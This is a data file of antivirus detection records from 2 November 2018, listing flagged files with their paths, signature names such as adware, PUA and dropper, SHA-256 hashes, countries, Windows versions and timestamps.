  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:35:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v_mzo8.x64.dll', filepath='\\\\?\\C:\\ProgramData\\DiscountExtensi\\V_MZo8.x64.dll', filesize=512000, name='ADWARE/Adware.Gen.#M300.#R5604'), hash='a1e97e0095bd869fcee2bd9914dabd68579476d2e946615e2169c3e49c5c28df', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v2smmxbdldd7na.x64.dll#a72a3e419eb03a67', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\220\\DDIGIICOUPPON\\V2SMMXbdLdd7Na.x64.dll#A72A3E419EB03A67', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='a1f7fa76543d5dc75fc1c0c6e64700002dae831cdef548ec70df6ed5e604632a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:15:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:22:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:58:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\Clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114201-dd44d5eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c576493\\AVSCAN-20181102-113606-B0797E42\\AVSCAN-20181102-114201-DD44D5EB', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tseafpzm.exe', filepath='C:\\Windows\\SysWOW64\\tvufazor\\tseafpzm.exe', filesize=13248000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='a2ba695233e533e0c2f7995bf24e789c31c00cee1f3676d1bc3aa17b70b2a6b2', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=44520, timestamp='2018-11-02T12:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091711-27131abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-091711-27131ABE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a2cff514bdff1c3a9e1e98222d19a4fccf8cd7e90943fd09fd0789a2f4109255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100902-8603ebf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100902-8603EBF2', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a361bdcee6a54fb7341497ca1cf995dedb4cd3c0b88783a325d36f6de67d2d40', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A361BDCEE6A54FB7341497CA1CF995DEDB4CD3C0B88783A325D36F6DE67D2D40', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a361bdcee6a54fb7341497ca1cf995dedb4cd3c0b88783a325d36f6de67d2d40', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\A36305778D7E6DB23DCE9E3D4E4106411A9672A4EF65899DB2D9D6B3429CC3FF.VIR', filesize=516000, name='TR/ATRAPS.Gen.#M300.#R3887'), hash='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:47:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.4d8794b310fe4ba59fbfea6f2d80fabe.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.4d8794b310fe4ba59fbfea6f2d80fabe.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:58:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173203-ef19b14a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15dbb0e0\\AVSCAN-20181024-231647-5F1E2250\\AVSCAN-20181102-173203-EF19B14A', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.6be9607ad71749a5996148fc27048ffd.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.6be9607ad71749a5996148fc27048ffd.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162236-20b20cdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67c12c65\\AVSCAN-20181102-162122-17303BEF\\AVSCAN-20181102-162236-20B20CDD', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.b15b339cdaa14fd0a1eca82c80a522cb.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.b15b339cdaa14fd0a1eca82c80a522cb.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='-XX:ErrorFile=.\\\\\\/.crashlogs\\\\\\/hs_err_pid%...ng=false -Dsun.java2d.d3...%...ng=false -Dsun.java2d.d3d=false -cp \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\DVAG Online-System\\\\\\\\smartclient\\\\\\\\smartup-7.92.0.0.1.36\\\\\\\\de_compeople_smartup_bootup-1.4.1.0.jar\\\\...ompeople.smartup.bootup.BootUp -jre \\\\\\"C:\\\\\\\\...\\\\\\\\.patchRepo\\\\\\" -ppid 12684 -factor 1.0 -sp...o\\\\\\" -ppid 12684 -factor 1.0 -splash \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\DVAG Online-System\\\\\\\\smartclient\\\\\\\\smartup-7.92.0.0.1.36\\\\\\\\dvag.bmp\\\\\\" -profile de', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\DVAG Online-System\\jre\\jre-1.8.0.172\\bin\\javaw.exe', parentsize=192424, timestamp='2018-11-02T15:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094823-c8ae943e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea2556e3\\AVSCAN-20181102-092056-4C43C110\\AVSCAN-20181102-094823-C8AE943E', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130100-5f590731', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3989d88a\\AVSCAN-20181102-125918-52FB0DC2\\AVSCAN-20181102-130100-5F590731', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130036-5c6d0ef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3989d88a\\AVSCAN-20181102-125918-52FB0DC2\\AVSCAN-20181102-130036-5C6D0EF5', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a3e30739498b6306acbb002dd37a2d76440694c3644eb90bea4f2338120d848e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-28\\A3E30739498B6306ACBB002DD37A2D76440694C3644EB90BEA4F2338120D848E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a3e30739498b6306acbb002dd37a2d76440694c3644eb90bea4f2338120d848e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160833-49189a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_53363b79\\AVSCAN-20181102-160504-2465731B\\AVSCAN-20181102-160833-49189A89', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172128-158cedb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1e6306a\\AVSCAN-20181102-172111-12EEB01C\\AVSCAN-20181102-172128-158CEDB1', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172136-16ed3f2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1e6306a\\AVSCAN-20181102-172111-12EEB01C\\AVSCAN-20181102-172136-16ED3F2D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreator-1_3_2_setup-downloader.exe', filepath='D:\\DJH\\OneDrive\\- DJH - DIVERSE SOFTWARE\\PDF CREATOR\\PDFCreator-1_3_2_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline='\\\\\\/background', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe', parentsize=1538656, timestamp='2018-11-02T16:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160833-49189bbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_53363b79\\AVSCAN-20181102-160437-1FADCA07\\AVSCAN-20181102-160833-49189BBC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreator-1_3_2_setup-downloader.exe', filepath='E:\\OneDrive\\- DJH - DIVERSE SOFTWARE\\PDF CREATOR\\PDFCreator-1_3_2_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:01:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\edman.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\edman.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gutterman.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\Gutterman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz80bb.tmp', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\trz80BB.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.exe', filepath='C:\\Users\\X\\AppData\\Local\\edman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\blockade\\ultimately.exe', parentsize=49429, timestamp='2018-11-02T14:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gutterman.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\Gutterman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz80bb.tmp', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\trz80BB.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz87ee.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trz87EE.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz87ee.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trz87EE.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jolt.exe', filepath='\\\\?\\C:\\Windows\\jolt.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jolt.exe', filepath='\\\\?\\C:\\Windows\\jolt.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:52Z'), dt=datetime.date(2018, 11, 2)),
